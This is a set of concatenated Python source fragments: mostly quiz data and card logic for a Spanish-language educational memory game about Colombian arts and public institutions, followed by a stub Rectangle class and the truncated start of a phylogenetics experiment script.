self.description[1] = "Estados Unidos a "
self.description[2] = "finales de los sesenta."
self.description[3] = "Se compone de cuatro "
self.description[4] = "pilares: MC (quien "
self.description[5] = "canta), DJ (que mezcla "
self.description[6] = "la música), Breakdance "
self.description[7] = "(quien baila) y Grafiti "
self.description[8] = "(quien pinta las paredes)"
self.question[0] = "¿En qué país surgio"
self.question[1] = "el hip hop?"
self.optionA[0] = "Inglaterra"
self.optionB[0] = "Estados Unidos"
self.optionC[0] = "Africa"
elif id == eActivityId._32_FOTOGRAFIA:
self.name = "Fotografía"
self.image = ResourceController.game_Activity32Fotografia
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "La fotografía es el arte"
self.description[1] = "y la técnica para "
self.description[2] = "obtener imágenes "
self.description[3] = "duraderas debidas a la"
self.description[4] = "acción de la luz. En la"
self.description[5] = "actualidad, lo más común"
self.description[6] = "es la fotografía digital,"
self.description[7] = "en esta se emplean "
self.description[8] = "sensores y memorias "
self.description[9] = "digitales."
self.question[0] = "¿Qué habilidades desarrollas"
self.question[1] = "cuando aprendes fotografía?"
self.optionA[0] = "Creatividad y observación"
self.optionB[0] = "Agilidad con las manos"
self.optionC[0] = "Planear y organizar"
elif id == eActivityId._33_CANTO:
self.name = "Canto"
self.image = ResourceController.game_Activity33Canto
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El canto es la emisión"
self.description[1] = "controlada de sonidos de"
self.description[2] = "la voz humana, siguiendo"
self.description[3] = "una composición musical."
self.question[0] = "¿Cuál de los siguientes"
self.question[1] = "elementos sirve para escuchar"
self.question[2] = "más fuertemente el canto de"
self.question[3] = "una persona?"
self.optionA[0] = "Luces"
self.optionB[0] = "Micrófono"
self.optionC[0] = "Sintetizador"
elif id == eActivityId._34_DIBUJO_ARTISTICO:
self.name = "Dibujo Artístico"
self.image = ResourceController.game_Activity34DibujoArtistico
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Se requieren aptitudes "
self.description[1] = "personales y naturales"
self.description[2] = "para realizar dibujos "
self.description[3] = "artísticos. A través de"
self.description[4] = "ellos el artista expresa"
self.description[5] = "su manera de ver la "
self.description[6] = "realidad."
self.question[0] = "¿Cuáles elementos necesitas"
self.question[1] = "para realizar dibujo artístico?"
self.optionA[0] = "Compás, reglas y papeles"
self.optionB[0] = "Compás, pegante y lápices"
self.optionC[0] = "Carboncillos, papeles,"
self.optionC[1] = "borradores"
elif id == eActivityId._35_CERAMICA:
self.name = "Cerámica"
self.image = ResourceController.game_Activity35Ceramica
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "La ceramica es el arte "
self.description[1] = "de fabricar recipientes,"
self.description[2] = "vasijas y otros objetos"
self.description[3] = "de arcilla, u otro "
self.description[4] = "material cerámico."
self.question[0] = "¿Qué elemento se necesita para"
self.question[1] = "fabricar objetos en arcilla?"
self.optionA[0] = "Luz"
self.optionB[0] = "Calor"
self.optionC[0] = "Viento"
elif id == eActivityId._36_ACUARELA:
self.name = "Acuarela"
self.image = ResourceController.game_Activity36Acuarela
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "La acuarela es una "
self.description[1] = "pintura sobre papel o"
self.description[2] = "cartulina con colores"
self.description[3] = "diluidos en agua. Los"
self.description[4] = "colores utilizados son"
self.description[5] = "transparentes (según la"
self.description[6] = "cantidad de agua en la "
self.description[7] = "mezcla) y a veces dejan"
self.description[8] = "ver el fondo del papel "
self.description[9] = "(blanco)."
self.question[0] = "Para modificar el color de"
self.question[1] = "la acuarela necesitas:"
self.optionA[0] = "Trementina y color blanco"
self.optionB[0] = "Agua y trementina"
self.optionC[0] = "Agua y pinceles"
elif id == eActivityId._37_REALIZACION_AUDIOVISUAL:
self.name = "Realización Audiovisual"
self.image = ResourceController.game_Activity37RealizacionAudiovisual
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es todo el proceso "
self.description[1] = "mediante el cuál se "
self.description[2] = "realizan producciones"
self.description[3] = "audiovisuales (que son"
self.description[4] = "las que se ven y se oyen)"
self.description[5] = "como programas de"
self.description[6] = "televisión."
self.question[0] = "¿Cuál de los siguientes es otro"
self.question[1] = "ejemplo de producción"
self.question[2] = "audiovisual?"
self.optionA[0] = "Una canción"
self.optionB[0] = "Una película"
self.optionC[0] = "Un dibujo"
elif id == eActivityId._38_CREACION_NARRATIVA:
self.name = "Creación Narrativa"
self.image = ResourceController.game_Activity38CreacionNarrativa
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "La creación narrativa es"
self.description[1] = "el arte de inventar "
self.description[2] = "historias y cuentos, "
self.description[3] = "puedes hacerlo solo o"
self.description[4] = "con otras personas."
self.question[0] = "¿La creación narrativa es"
self.question[1] = "el arte de inventar?"
self.optionA[0] = "Dibujos"
self.optionB[0] = "Historias y cuentos"
self.optionC[0] = "Canciones"
elif id == eActivityId._39_POESIA_Y_DECLAMACION:
self.name = "Poesía y Declamación"
self.image = ResourceController.game_Activity39PoesiaYDeclamacion
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "No todos los poetas se"
self.description[1] = "dedicaron a escribir "
self.description[2] = "poemas para adultos, "
self.description[3] = "algunos escribian "
self.description[4] = "también para niños."
self.question[0] = "¿Cuál de los siguientes"
self.question[1] = "personajes es un famoso"
self.question[2] = "poeta infantil?"
self.optionA[0] = "Mario Benedetti"
self.optionB[0] = "Rafael Pombo"
self.optionC[0] = "Pablo Neruda"
elif id == eActivityId._40_BANDA_MARCIAL:
self.name = "Banda Marcial"
self.image = ResourceController.game_Activity40BandaMarcial
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Una banda marcial se "
self.description[1] = "compone de un grupo de"
self.description[2] = "musicos que marchando"
self.description[3] = "tocan diferentes "
self.description[4] = "instrumentos y que"
self.description[5] = "generalmente se "
self.description[6] = "presentan en vivo y al "
self.description[7] = "aire libre."
self.question[0] = "¿En una banda marcial,"
self.question[1] = "los músicos van?"
self.optionA[0] = "Marchando"
self.optionB[0] = "Corriendo"
self.optionC[0] = "Hablando"
elif id == eActivityId._41_MUSICA_ANDINA:
self.name = "Música Andina"
self.image = ResourceController.game_Activity41MusicaAndina
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Música andina es un "
self.description[1] = "término que se aplica a"
self.description[2] = "diversos generos "
self.description[3] = "músicales originados en"
self.description[4] = "los Andes sudamericanos,"
self.description[5] = "particularmente en Perú."
self.question[0] = "¿Música andina es un término"
self.question[1] = "que se aplica a diversos"
self.question[2] = "generos músicales originados"
self.question[3] = "en?"
self.optionA[0] = "Europa"
self.optionB[0] = "Los Andes sudamericanos"
self.optionC[0] = "Asia"
elif id == eActivityId._42_GUITARRA:
self.name = "Guitarra"
self.image = ResourceController.game_Activity42Guitarra
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Es un instrumento "
self.description[1] = "músical de seis cuerdas,"
self.description[2] = "utilizado en la música"
self.description[3] = "colombiana y en ritmos "
self.description[4] = "como el rock, el "
self.description[5] = "flamenco y la música de"
self.description[6] = "cantautor."
self.question[0] = "¿Cuántas cuerdas tiene"
self.question[1] = "una guitarra?"
self.optionA[0] = "Siete"
self.optionB[0] = "Cinco"
self.optionC[0] = "Seis"
elif id == eActivityId._43_TITERES:
self.name = "Títeres"
self.image = ResourceController.game_Activity43Titeres
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Actividad artística que"
self.description[1] = "consiste en la"
self.description[2] = "manipulación de muñecos"
self.description[3] = "en escenarios decorados"
self.description[4] = "con cortinas."
self.question[0] = "¿Los títeres también se"
self.question[1] = "conocen cómo?"
self.optionA[0] = "Teatro de muñecos"
self.optionB[0] = "Teatro de marionetas"
self.optionC[0] = "Teatro para niños"
elif id == eActivityId._44_FLAUTAS:
self.name = "Flautas"
self.image = ResourceController.game_Activity44Flautas
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un instrumento"
self.description[1] = "músical de viento,"
self.description[2] = "que tiene una serie de"
self.description[3] = "orificios y una"
self.description[4] = "boquilla."
self.question[0] = "Algunos tipos de flautas"
self.question[1] = "son:"
self.optionA[0] = "Traversa, dulce, ocarina"
self.optionB[0] = "Larga, corta, traversa"
self.optionC[0] = "Ocarina, larga, quena"
elif id == eActivityId._45_CLUB_DE_LECTURA:
self.name = "Club de lectura"
self.image = ResourceController.game_Activity45ClubDeLectura
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "En el club de lectura "
self.description[1] = "las personas se reunen a"
self.description[2] = "leer cuentos e historias."
self.question[0] = "Si quieres participar en un"
self.question[1] = "club de lectura puedes ir a:"
self.optionA[0] = "El teatro"
self.optionB[0] = "El coliseo"
self.optionC[0] = "La Casa de la Cultura"
elif id == eActivityId._46_GRUPO_DE_ROCK:
self.name = "Grupo de Rock"
self.image = ResourceController.game_Activity46GrupoDeRock
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El rock es un genero"
self.description[1] = "músical del siglo XX"
self.description[2] = "que se originó en"
self.description[3] = "Estados Unidos. Su"
self.description[4] = "sonido se basa"
self.description[5] = "principalmente en la"
self.description[6] = "guitarra eléctrica."
self.question[0] = "¿Además de la guitarra cuáles"
self.question[1] = "de los siguientes instrumentos"
self.question[2] = "se utilizan en un grupo de rock?"
self.optionA[0] = "La flauta y el piano"
self.optionB[0] = "La batería y el bajo eléctrico"
self.optionC[0] = "El violin y el piano"
elif id == eActivityId._47_BANDA_SINFONICA:
self.name = "Banda Sinfónica"
self.image = ResourceController.game_Activity47BandaSinfonica
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Una banda sinfónica está"
self.description[1] = "compuesta por "
self.description[2] = "instrumentos de viento y"
self.description[3] = "percusión, y también, "
self.description[4] = "por algunos instrumentos"
self.description[5] = "de cuerda, como el "
self.description[6] = "violonchelo, el "
self.description[7] = "contrabajo, el piano "
self.description[8] = "y el arpa."
self.question[0] = "Cuando en una banda se usan"
self.question[1] = "instrumentos de viento y percusión,"
self.question[2] = "y además instrumentos de cuerda,"
self.question[3] = "esta se llama:"
self.optionA[0] = "Banda de música"
self.optionB[0] = "Banda sinfónica"
self.optionC[0] = "Banda popular"
elif id == eActivityId._48_GAITAS_Y_TAMBORES:
self.name = "Gaitas y Tambores"
self.image = ResourceController.game_Activity48GaitasYTambores
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "La gaita es un"
self.description[1] = "instrumento musical de"
self.description[2] = "viento. El tambor es un"
self.description[3] = "instrumento de"
self.description[4] = "percusión. La unión de"
self.description[5] = "estos dos instrumentos"
self.description[6] = "permite interpretar"
self.description[7] = "música del Caribe"
self.description[8] = "colombiano."
self.question[0] = "¿Cuál de los siguientes grupos"
self.question[1] = "colombianos es famoso por"
self.question[2] = "interpretar gaitas y tambores?"
self.optionA[0] = "Los Gaiteros de San Jacinto"
self.optionB[0] = "Los corraleros de Majagual"
self.optionC[0] = "Lucho Bermúdez y su orquesta"
elif id == eActivityId._49_MUSICA_CARRANGUERA:
self.name = "Música Carranguera"
self.image = ResourceController.game_Activity49MusicaCarranguera
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es un tipo de música"
self.description[1] = "folclórica colombiana"
self.description[2] = "que nació en la región"
self.description[3] = "andina. Uno de los"
self.description[4] = "grupos más"
self.description[5] = "representativos de este"
self.description[6] = "género musical es Los"
self.description[7] = "Carrangueros de Ráquira"
self.question[0] = "¿Cuál de los siguientes cantantes"
self.question[1] = " es famoso por interpretar"
self.question[2] = "música carranguera?"
self.optionA[0] = "Pipe Peláez"
self.optionB[0] = "Jorge Veloza"
self.optionC[0] = "Darío Gómez"
elif id == eActivityId._50_PIANO:
self.name = "Piano"
self.image = ResourceController.game_Activity50Piano
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "El piano es un "
self.description[1] = "instrumento musical"
self.description[2] = "clasificado como "
self.description[3] = "instrumento de teclado "
self.description[4] = "de cuerdas percutidas."
self.description[5] = "Es muy utilizado en "
self.description[6] = "hermosas melodias de "
self.description[7] = "música clásica."
self.question[0] = "Los siguientes son los dos"
self.question[1] = "colores de las teclas del"
self.question[2] = "piano:"
self.optionA[0] = "Negro y azul"
self.optionB[0] = "Blanco y gris metalizado"
self.optionC[0] = "Blanco y negro"
elif id == eActivityId._51_INSTITUTO_COLOMBIANO_DE_BIENESTAR_FAMILIAR:
self.name = "Instituto Colombiano de Bienestar Familiar (ICBF)"
self.nameToShow1 = "Instituto colombiano de"
self.nameToShow2 = "bienestar familiar (ICBF)"
self.image = ResourceController.game_Activity51InstitutoColombianoDeBienestarFamiliar
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El ICBF trabaja por el "
self.description[1] = "desarrollo y la "
self.description[2] = "protección integral de "
self.description[3] = "la primera infancia, la"
self.description[4] = "niñez, la adolescencia y"
self.description[5] = "el bienestar de las "
self.description[6] = "familias colombianas. "
self.description[7] = "Se puede acudir a esta"
self.description[8] = "institución cuando un niño,"
self.description[9] = "niña o adolescente esté"
self.description[10] = "siendo abusado física,"
self.description[11] = "laboral o sexualmente."
self.question[0] = "¿Por qué trabaja el ICBF?"
self.optionA[0] = "Para generar ingresos"
self.optionB[0] = "Para el desarrollo y la"
self.optionB[1] = "protección de las familias"
self.optionC[0] = "Para la seguridad de"
self.optionC[1] = "los municipios"
elif id == eActivityId._52_POLICIA_NACIONAL:
self.name = "Policía Nacional"
self.image = ResourceController.game_Activity52PoliciaNacional
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "La Policía Nacional"
self.description[1] = "mantiene las condiciones"
self.description[2] = "necesarias para el"
self.description[3] = "ejercicio de los"
self.description[4] = "derechos y libertades"
self.description[5] = "públicas, y para"
self.description[6] = "asegurar que Colombia"
self.description[7] = "viva en paz. Se puede"
self.description[8] = "acudir a ella cuando"
self.description[9] = "una persona está siendo"
self.description[10] = "sometida a maltrato"
self.description[11] = "físico o verbal."
self.question[0] = "¿Cuándo se debe acudir"
self.question[1] = "a la policía?"
self.optionA[0] = "Si una persona no pagó"
self.optionA[1] = "una deuda"
self.optionB[0] = "Si una persona le está"
self.optionB[1] = "haciendo daño a otra"
self.optionC[0] = "Si a una persona se le"
self.optionC[1] = "está incendiando su casa"
elif id == eActivityId._53_COMISARIA_DE_FAMILIA:
self.name = "Comisaría de Familia"
self.image = ResourceController.game_Activity53ComisariaDeFamilia
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es una entidad que ayuda"
self.description[1] = "orienta a las familias,"
self.description[2] = "las ayuda a reflexionar"
self.description[3] = "y a establecer acuerdos"
self.description[4] = "cuando tienen"
self.description[5] = "dificultades. Busca que"
self.description[6] = "los derechos de todos"
self.description[7] = "los miembros de la"
self.description[8] = "familia sean reconocidos"
self.description[9] = "y respetados."
self.question[0] = "¿En cuál de estas situaciones"
self.question[1] = "un niño o una familia puede"
self.question[2] = "acudir a la comisaría de"
self.question[3] = "familia?"
self.optionA[0] = "Cuando uno de los miembros de la"
self.optionA[1] = "familia tiene problemas de salud"
self.optionB[0] = "Cuando los padres maltratan a sus hijos"
self.optionB[1] = "o cuando los padres se golpean"
self.optionC[0] = "Cuando un miembro de la"
self.optionC[1] = "familia está perdido"
elif id == eActivityId._54_CASA_DE_LA_JUSTICIA:
self.name = "Casa de la Justicia"
self.image = ResourceController.game_Activity54CasaDeLaJusticia
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "La casa de justicia fue "
self.description[1] = "creada para asesorar, "
self.description[2] = "apoyar y fortalecer la "
self.description[3] = "gestión de las "
self.description[4] = "autoridades "
self.description[5] = "territoriales, con el"
self.description[6] = "objetivo de garantizar "
self.description[7] = "el derecho del acceso a"
self.description[8] = "la justicia de todos los"
self.description[9] = "ciudadanos."
self.question[0] = "¿Qué derecho garantizan las"
self.question[1] = "casas de justicia?"
self.optionA[0] = "El derecho a la salud"
self.optionB[0] = "El derecho a la vivienda"
self.optionC[0] = "El derecho a la justicia"
elif id == eActivityId._55_ALCALDIA:
self.name = "Alcaldía"
self.image = ResourceController.game_Activity55Alcaldia
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Desde allí se ejerce la "
self.description[1] = "administración política "
self.description[2] = "de una ciudad, municipio"
self.description[3] = "o pueblo, en nuestro "
self.description[4] = "país quien ejerce esta"
self.description[5] = "función se denomina "
self.description[6] = "Alcalde y es elegido a "
self.description[7] = "través del voto."
self.question[0] = "La máxima autoridad de un"
self.question[1] = "municipio se llama:"
self.optionA[0] = "Edil"
self.optionB[0] = "Alcalde"
self.optionC[0] = "Concejal"
elif id == eActivityId._56_SERVICIO_NACIONAL_DE_APRENDIZAJE:
self.name = "Servicio Nacional de Aprendizaje (SENA)"
self.nameToShow1 = "Servicio nacional de"
self.nameToShow2 = "aprendizaje (SENA)"
self.image = ResourceController.game_Activity56ServicioNacionalDeAprendizaje
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El SENA ofrece formación"
self.description[1] = "profesional para jóvenes"
self.description[2] = "y adultos en actividades"
self.description[3] = "productivas que les"
self.description[4] = "permiten conseguir"
self.description[5] = "empleo o formar su"
self.description[6] = "propia empresa."
self.question[0] = "¿Qué ofrece el SENA?"
self.optionA[0] = "Clases de baile"
self.optionB[0] = "Formación profesional"
self.optionB[1] = "para jóvenes y adultos"
self.optionC[0] = "Servicios de salud"
elif id == eActivityId._57_CASA_DE_LA_CULTURA:
self.name = "Casa de la Cultura"
self.image = ResourceController.game_Activity57CasaDeLaCultura
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Las Casa de la Cultura"
self.description[1] = "tiene como objetivo"
self.description[2] = "brindar un espacio"
self.description[3] = "permanente para que"
self.description[4] = "todas las personas"
self.description[5] = "accedan a las"
self.description[6] = "diferentes"
self.description[7] = "manifestaciones del"
self.description[8] = "arte, la cultura y el"
self.description[9] = "patrimonio."
self.question[0] = "¿Cuál es el objetivo de la"
self.question[1] = "casa de la cultura?"
self.optionA[0] = "Brindar un espacio"
self.optionA[1] = "para la relajación"
self.optionB[0] = "Brindar un espacio para las"
self.optionB[1] = "manifestaciones culturales"
self.optionC[0] = "Dar clases para manejar"
self.optionC[1] = "computadores"
elif id == eActivityId._58_INSTITUTO_MUNICIPAL_DE_RECREACION_Y_DEPORTE:
self.name = "Instituto Municipal de Recreación y Deporte (IMRD)"
self.nameToShow1 = "Instituto municipal de"
self.nameToShow2 = "recreación y deporte"
self.image = ResourceController.game_Activity58InstitutoMunicipalDeRecreacionYDeport
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "El IMRD promueve el "
self.description[1] = "ejercicio y goce pleno"
self.description[2] = "del derecho al deporte,"
self.description[3] = "la recreación, la "
self.description[4] = "actividad física, el "
self.description[5] = "aprovechamiento del "
self.description[6] = "tiempo libre y el buen"
self.description[7] = "uso de parques y "
self.description[8] = "escenarios para todos"
self.description[9] = "los ciudadanos."
self.question[0] = "¿Qué opciones le puede ofrecer"
self.question[1] = "el IMRD a una persona que quiera"
self.question[1] = "usar bien su tiempo libre?"
self.optionA[0] = "Conocer los mejores"
self.optionA[1] = "programas de televisión"
self.optionB[0] = "Informa las películas que"
self.optionB[1] = "hay en cartelera"
self.optionC[0] = "Actividades culturales, deportes y"
self.optionC[1] = "espectáculos para diferentes edades"
elif id == eActivityId._59_HOSPITAL:
self.name = "Hospital"
self.image = ResourceController.game_Activity59Hospital
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Un hospital es un"
self.description[1] = "lugar donde se atiende"
self.description[2] = "a los enfermos para"
self.description[3] = "diagnosticar su"
self.description[4] = "enfermedad y brindarles"
self.description[5] = "el tratamiento que"
self.description[6] = "necesitan."
self.question[0] = "¿A quién se atiende"
self.question[1] = "en un hospital?"
self.optionA[0] = "A los artistas"
self.optionB[0] = "A los enfermos"
self.optionC[0] = "A los deportistas"
elif id == eActivityId._60_CASA_UNIDOS:
self.name = "Casa UNIDOS"
self.image = ResourceController.game_Activity60CasaUnidos
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Es un lugar de encuentro"
self.description[1] = "para las familias que"
self.description[2] = "pertenecen a la"
self.description[3] = "estrategia UNIDOS, en el"
self.description[4] = "que pueden hablar con"
self.description[5] = "los cogestores y a la"
self.description[6] = "vez que enterarse de las"
self.description[7] = "ofertas que existen en"
self.description[8] = "el municipio para"
self.description[9] = "atender las"
self.description[10]= "necesidades de la"
self.description[11]= "población."
self.question[0] = "¿Quiénes asisten a la"
self.question[1] = "casa UNIDOS?"
self.optionA[0] = "Los niños y jóvenes"
self.optionA[1] = "en general"
self.optionB[0] = "Los deportistas"
self.optionC[0] = "Las familias UNIDOS"
elif id == eActivityId._61_COMODIN:
self.name = "Comodin Estrella"
self.image = ResourceController.game_Activity61Comodin
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un espacio de "
self.description[1] = "encuentro para las "
self.description[2] = "familias que pertenecen"
self.description[3] = "a la estrategia UNIDOS,"
self.description[4] = "en el que pueden "
self.description[5] = "interactuar con los "
self.description[6] = "cogestores, a la vez que"
self.description[7] = "enterarse de las ofertas"
self.description[8] = "que existen en el "
self.description[9] = "municipio para las "
self.description[10] = "necesidades de la "
self.description[11] = "población."
self.question[0] = ""
self.question[1] = ""
self.optionA[0] = ""
self.optionB[0] = ""
self.optionC[0] = ""
class Card:
def __init__(self, activityId, indexes):
# Position
row = indexes[0]
column = indexes[1]
self.__xPos = 0
self.__yPos = 0
if GlobalsController.GAME_DIFFICULTY == eGameDifficulty.EASY:
self.__xPos = 190 + (170 * column)
self.__yPos = 120 + (175 * row)
elif GlobalsController.GAME_DIFFICULTY == eGameDifficulty.NORMAL:
self.__xPos = 110 + (170 * column)
self.__yPos = 120 + (175 * row)
elif GlobalsController.GAME_DIFFICULTY == eGameDifficulty.HARD:
self.__xPos = 10 + (148 * column)
self.__yPos = 120 + (175 * row)
# Identification
self.activityId = activityId
self.__isOpen = False
self.__image = InformationActivities.allActivities[self.activityId].image
def doPaint(self, displaySurface):
if self.__isOpen == True:
displaySurface.blit(ResourceController.game_CardOpen, (self.__xPos, self.__yPos))
displaySurface.blit(self.__image, (self.__xPos, self.__yPos))
else:
displaySurface.blit(ResourceController.game_CardClose, (self.__xPos, self.__yPos))
def isOpen(self):
return self.__isOpen
def flipToShow(self):
self.__isOpen = True
def flipToHide(self):
self.__isOpen = False
class InformationActivities:
# ----------------------------
# Contenedores
# ----------------------------
allActivities = dict()
# ----------------------------
# Referencias unicas
# ----------------------------
act01 = Activity(eActivityId._01_BICICROS)
act02 = Activity(eActivityId._02_PATINAJE)
act03 = Activity(eActivityId._03_FUTSAL)
act04 = Activity(eActivityId._04_FUTBOL)
act05 = Activity(eActivityId._05_PORRISMO)
act06 = Activity(eActivityId._06_ATLETISMO)
act07 = Activity(eActivityId._07_BALONCESTO)
act08 = Activity(eActivityId._08_KARATE_DO)
act09 = Activity(eActivityId._09_LEVANTAMIENTO_DE_PESAS)
act10 = Activity(eActivityId._10_TAEKWON_DO)
act11 = Activity(eActivityId._11_BADMINTON)
act12 = Activity(eActivityId._12_TENIS_DE_MESA)
act13 = Activity(eActivityId._13_ESGRIMA)
act14 = Activity(eActivityId._14_GIMNASIA_ARTISTICA)
act15 = Activity(eActivityId._15_AJEDREZ)
act16 = Activity(eActivityId._16_AEROBICOS)
act17 = Activity(eActivityId._17_NATACION)
act18 = Activity(eActivityId._18_BOXEO)
act19 = Activity(eActivityId._19_EQUITACION)
act20 = Activity(eActivityId._20_GOLF)
act21 = Activity(eActivityId._21_JUDO)
act22 = Activity(eActivityId._22_RUGBY)
act23 = Activity(eActivityId._23_TENIS)
act24 = Activity(eActivityId._24_VOLEIBOL)
act25 = Activity(eActivityId._25_HOCKEY)
act26 = Activity(eActivityId._26_TEATRO)
act27 = Activity(eActivityId._27_MUSICA)
act28 = Activity(eActivityId._28_DANZA_FOLCLORICA)
act29 = Activity(eActivityId._29_BREAK_DANCE)
act30 = Activity(eActivityId._30_BALLET)
act31 = Activity(eActivityId._31_HIP_HOP)
act32 = Activity(eActivityId._32_FOTOGRAFIA)
act33 = Activity(eActivityId._33_CANTO)
act34 = Activity(eActivityId._34_DIBUJO_ARTISTICO)
act35 = Activity(eActivityId._35_CERAMICA)
act36 = Activity(eActivityId._36_ACUARELA)
act37 = Activity(eActivityId._37_REALIZACION_AUDIOVISUAL)
act38 = Activity(eActivityId._38_CREACION_NARRATIVA)
act39 = Activity(eActivityId._39_POESIA_Y_DECLAMACION)
act40 = Activity(eActivityId._40_BANDA_MARCIAL)
act41 = Activity(eActivityId._41_MUSICA_ANDINA)
act42 = Activity(eActivityId._42_GUITARRA)
act43 = Activity(eActivityId._43_TITERES)
act44 = Activity(eActivityId._44_FLAUTAS)
act45 = Activity(eActivityId._45_CLUB_DE_LECTURA)
act46 = Activity(eActivityId._46_GRUPO_DE_ROCK)
act47 = Activity(eActivityId._47_BANDA_SINFONICA)
act48 = Activity(eActivityId._48_GAITAS_Y_TAMBORES)
act49 = Activity(eActivityId._49_MUSICA_CARRANGUERA)
act50 = Activity(eActivityId._50_PIANO)
act51 = Activity(eActivityId._51_INSTITUTO_COLOMBIANO_DE_BIENESTAR_FAMILIAR)
act52 = Activity(eActivityId._52_POLICIA_NACIONAL)
act53 = Activity(eActivityId._53_COMISARIA_DE_FAMILIA)
act54 = Activity(eActivityId._54_CASA_DE_LA_JUSTICIA)
act55 = Activity(eActivityId._55_ALCALDIA)
act56 = Activity(eActivityId._56_SERVICIO_NACIONAL_DE_APRENDIZAJE)
act57 = Activity(eActivityId._57_CASA_DE_LA_CULTURA)
act58 = Activity(eActivityId._58_INSTITUTO_MUNICIPAL_DE_RECREACION_Y_DEPORTE)
act59 = Activity(eActivityId._59_HOSPITAL)
act60 = Activity(eActivityId._60_CASA_UNIDOS)
act61 = Activity(eActivityId._61_COMODIN)
# ----------------------------
# Diccionario de todas las actividades
# ----------------------------
allActivities[eActivityId._01_BICICROS] = act01
allActivities[eActivityId._02_PATINAJE] = act02
allActivities[eActivityId._03_FUTSAL] = act03
allActivities[eActivityId._04_FUTBOL] = act04
allActivities[eActivityId._05_PORRISMO] = act05
allActivities[eActivityId._06_ATLETISMO] = act06
allActivities[eActivityId._07_BALONCESTO] = act07
allActivities[eActivityId._08_KARATE_DO] = act08
allActivities[eActivityId._09_LEVANTAMIENTO_DE_PESAS] = act09
allActivities[eActivityId._10_TAEKWON_DO] = act10
allActivities[eActivityId._11_BADMINTON] = act11
allActivities[eActivityId._12_TENIS_DE_MESA] = act12
allActivities[eActivityId._13_ESGRIMA] = act13
allActivities[eActivityId._14_GIMNASIA_ARTISTICA] = act14
allActivities[eActivityId._15_AJEDREZ] = act15
allActivities[eActivityId._16_AEROBICOS] = act16
allActivities[eActivityId._17_NATACION] = act17
allActivities[eActivityId._18_BOXEO] = act18
allActivities[eActivityId._19_EQUITACION] = act19
allActivities[eActivityId._20_GOLF] = act20
allActivities[eActivityId._21_JUDO] = act21
allActivities[eActivityId._22_RUGBY] = act22
allActivities[eActivityId._23_TENIS] = act23
allActivities[eActivityId._24_VOLEIBOL] = act24
allActivities[eActivityId._25_HOCKEY] = act25
allActivities[eActivityId._26_TEATRO] = act26
allActivities[eActivityId._27_MUSICA] = act27
allActivities[eActivityId._28_DANZA_FOLCLORICA] = act28
allActivities[eActivityId._29_BREAK_DANCE] = act29
allActivities[eActivityId._30_BALLET] = act30
allActivities[eActivityId._31_HIP_HOP] = act31
allActivities[eActivityId._32_FOTOGRAFIA] = act32
allActivities[eActivityId._33_CANTO] = act33
allActivities[eActivityId._34_DIBUJO_ARTISTICO] = act34
allActivities[eActivityId._35_CERAMICA] = act35
allActivities[eActivityId._36_ACUARELA] = act36
allActivities[eActivityId._37_REALIZACION_AUDIOVISUAL] = act37
allActivities[eActivityId._38_CREACION_NARRATIVA] = act38
allActivities[eActivityId._39_POESIA_Y_DECLAMACION] = act39
allActivities[eActivityId._40_BANDA_MARCIAL] = act40
allActivities[eActivityId._41_MUSICA_ANDINA] = act41
allActivities[eActivityId._42_GUITARRA] = act42
allActivities[eActivityId._43_TITERES] = act43
allActivities[eActivityId._44_FLAUTAS] = act44
allActivities[eActivityId._45_CLUB_DE_LECTURA] = act45
allActivities[eActivityId._46_GRUPO_DE_ROCK] = act46
allActivities[eActivityId._47_BANDA_SINFONICA] = act47
allActivities[eActivityId._48_GAITAS_Y_TAMBORES] = act48
allActivities[eActivityId._49_MUSICA_CARRANGUERA] = act49
allActivities[eActivityId._50_PIANO] = act50
allActivities[eActivityId._51_INSTITUTO_COLOMBIANO_DE_BIENESTAR_FAMILIAR] = act51
allActivities[eActivityId._52_POLICIA_NACIONAL] = act52
allActivities[eActivityId._53_COMISARIA_DE_FAMILIA] = act53
allActivities[eActivityId._54_CASA_DE_LA_JUSTICIA] = act54
allActivities[eActivityId._55_ALCALDIA] = act55
allActivities[eActivityId._56_SERVICIO_NACIONAL_DE_APRENDIZAJE] = act56
allActivities[eActivityId._57_CASA_DE_LA_CULTURA] = act57
allActivities[eActivityId._58_INSTITUTO_MUNICIPAL_DE_RECREACION_Y_DEPORTE] = act58
allActivities[eActivityId._59_HOSPITAL] = act59
allActivities[eActivityId._60_CASA_UNIDOS] = act60
allActivities[eActivityId._61_COMODIN] = act61
|
#!/usr/bin/python3
class Rectangle:
""" empty class that defines a rectangle """
pass
|
import sys
import os
import subprocess
sys.path.insert(0, 'scripts')
sys.path.insert(0, 'tools/families')
sys.path.insert(0, 'tools/generax')
import saved_metrics
import rf_cells
import experiments as exp
import shutil
import time
import fam
import sequence_model
import fast_rf_cells
import extract_event_number
import events
def get_possible_strategies():
return ["SPR", "EVAL", "SKIP", "RECONCILE"]
def check_inputs(strategy):
if (not (strategy in get_possible_strategies())):
